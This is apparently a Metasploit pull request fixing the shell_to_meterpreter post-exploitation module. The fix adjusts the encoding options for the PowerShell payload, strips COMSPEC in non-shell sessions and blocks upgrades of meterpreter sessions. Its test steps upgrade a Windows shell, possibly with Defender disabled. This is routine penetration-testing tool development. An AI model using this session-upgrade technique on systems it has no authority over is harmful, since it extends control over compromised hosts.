### PR TITLE
fix encoding and comspec in shell_to_meterpreter (sessions -u)

### DIFF
--- a/modules/post/multi/manage/shell_to_meterpreter.rb
+++ b/modules/post/multi/manage/shell_to_meterpreter.rb
@@ -157,10 +157,13 @@ class MetasploitModule < Msf::Post
 
         encoded_psh_payload = encode_script(psh_payload)
         cmd_exec(run_hidden_psh(encoded_psh_payload, psh_arch, true))
-      else # shell
+      else
         if (have_powershell?) && (datastore['WIN_TRANSFER'] != 'VBS')
           vprint_status("Transfer method: Powershell")
-          psh_opts = { :prepend_sleep => 1, :encode_inner_payload => true, :persist => false }
+          psh_opts = { :encode_final_payload => true, :persist => false, :prepend_sleep => 1 }
+          if session.type != 'shell'
+            psh_opts[:remove_comspec] = true
+          end
           cmd_exec(cmd_psh_payload(payload_data, psh_arch, psh_opts))
         else
           print_error('Powershell is not installed on the target.') if datastore['WIN_TRANSFER'] == 'POWERSHELL'

--- a/modules/post/multi/manage/shell_to_meterpreter.rb
+++ b/modules/post/multi/manage/shell_to_meterpreter.rb
@@ -52,6 +52,11 @@ class MetasploitModule < Msf::Post
   def run
     print_status("Upgrading session ID: #{datastore['SESSION']}")
 
+    if session.type == 'meterpreter'
+      print_error("Meterpreter sessions cannot be upgraded any higher")
+      return nil
+    end
+
     # Try hard to find a valid LHOST value in order to
     # make running 'sessions -u' as robust as possible.
     if datastore['LHOST']
@@ -161,7 +166,7 @@ class MetasploitModule < Msf::Post
         if (have_powershell?) && (datastore['WIN_TRANSFER'] != 'VBS')
           vprint_status("Transfer method: Powershell")
           psh_opts = { :encode_final_payload => true, :persist => false, :prepend_sleep => 1 }
-          if session.type != 'shell'
+          unless session.type == 'shell'
             psh_opts[:remove_comspec] = true
           end
           cmd_exec(cmd_psh_payload(payload_data, psh_arch, psh_opts))


### PR DESCRIPTION
Fixes https://github.com/rapid7/metasploit-framework/issues/14391

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] Get a shell or powershell session on Windows (you may need to disable Windows defender on Windows 10)
- [x] `sessions -u <ID>`
- [x] **Verify** you get a meterpreter session
- [x] `sessions -u <ID>` (with the id of the new meterpreter session)
- [x] **Verify** you get another meterpreter session

